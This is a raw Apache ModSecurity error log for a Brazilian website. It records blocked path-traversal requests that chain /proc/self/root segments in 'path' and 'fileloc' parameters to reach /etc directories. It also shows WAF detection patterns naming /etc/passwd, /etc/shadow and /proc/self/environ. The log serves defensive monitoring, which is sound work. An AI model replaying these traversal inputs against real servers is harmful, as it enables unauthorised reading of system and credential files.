https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:17:10.249127 2026] [:error] [pid 31803:tid 140411708356352] [client 74.7.241.31:41566] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abql1uyqAr6etmhZHNq6UQAAAEQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:18:11.590225 2026] [:error] [pid 30077:tid 140411683178240] [client 74.7.243.128:48738] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqmE_u8EFLIOrSqIpv_0AAAAkc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:18:24.819675 2026] [:error] [pid 31803:tid 140411725141760] [client 74.7.243.128:50582] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqmIOyqAr6etmhZHNq6hAAAAEI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:18:29.477393 2026] [:error] [pid 15051:tid 140411557287680] [client 74.7.244.43:55668] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqmJSmAPhZkrhU8w4ln_AAAAJY"]
[Wed Mar 18 10:18:30.621606 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.228.61:42524] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqmJuyqAr6etmhZHNq6hwAAAFc"]
[Wed Mar 18 10:19:12.363915 2026] [mime_magic:error] [pid 11816:tid 140411548894976] (70014)End of file found: [client 57.141.18.43:33994] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 10:20:44.197026 2026] [mime_magic:error] [pid 31803:tid 140411699963648] (70014)End of file found: [client 57.141.18.83:36696] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 10:21:00.208102 2026] [:error] [pid 19507:tid 140411548894976] [client 74.7.241.31:41628] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqmvNY0UrI5A3LftIyiRgAAAZc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:21:10.283039 2026] [:error] [pid 31803:tid 140411683178240] [client 74.7.241.31:60996] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqmxuyqAr6etmhZHNq7DAAAAEc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:21:44.853648 2026] [:error] [pid 31803:tid 140411725141760] [client 74.7.241.31:48698] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqm6OyqAr6etmhZHNq7SgAAAEI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:21:51.785920 2026] [:error] [pid 17653:tid 140411683178240] [client 74.7.243.128:58374] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqm78df6f5d65gmYZTRZQAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:21:53.262188 2026] [:error] [pid 30077:tid 140411565680384] [client 74.7.243.128:33992] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqm8fu8EFLIOrSqIpsARwAAAlU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:21:53.728902 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.243.128:34004] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqm8da6ubjKNq_cu4aVGQAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:21:55.048428 2026] [:error] [pid 29882:tid 140411557287680] [client 74.7.243.128:34014] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqm80zinOy1jxa1j4cQ3QAAARY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:21:56.389620 2026] [:error] [pid 17887:tid 140411691570944] [client 74.7.243.128:34026] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqm9AkwaGbbGflqUZAL6wAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:21:57.254978 2026] [:error] [pid 29882:tid 140411733534464] [client 74.7.241.31:34648] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqm9UzinOy1jxa1j4cQ4AAAAQE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:21:57.742749 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.243.128:34040] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqm9da6ubjKNq_cu4aVHgAAA0c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:21:59.051424 2026] [:error] [pid 30077:tid 140411574073088] [client 74.7.243.128:34052] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqm9_u8EFLIOrSqIpsASgAAAlQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:22:00.351494 2026] [:error] [pid 31803:tid 140411708356352] [client 74.7.243.128:36482] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqm-OyqAr6etmhZHNq7VAAAAEQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:22:01.638269 2026] [:error] [pid 30077:tid 140411599251200] [client 74.7.243.128:36486] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqm-fu8EFLIOrSqIpsASwAAAlE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:22:02.974714 2026] [:error] [pid 15826:tid 140411658000128] [client 74.7.243.128:36502] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqm-uoXxyEfFpUF8f9pwAAAAUo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:22:04.386296 2026] [:error] [pid 15051:tid 140411548894976] [client 74.7.243.128:36510] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqm_CmAPhZkrhU8w4loaQAAAJc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:22:05.746987 2026] [:error] [pid 29882:tid 140411607643904] [client 74.7.243.128:36522] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqm_UzinOy1jxa1j4cQ6wAAARA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:22:07.051690 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.243.128:36536] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqm_9a6ubjKNq_cu4aVKQAAA1c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:22:08.399650 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.243.128:36538] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag 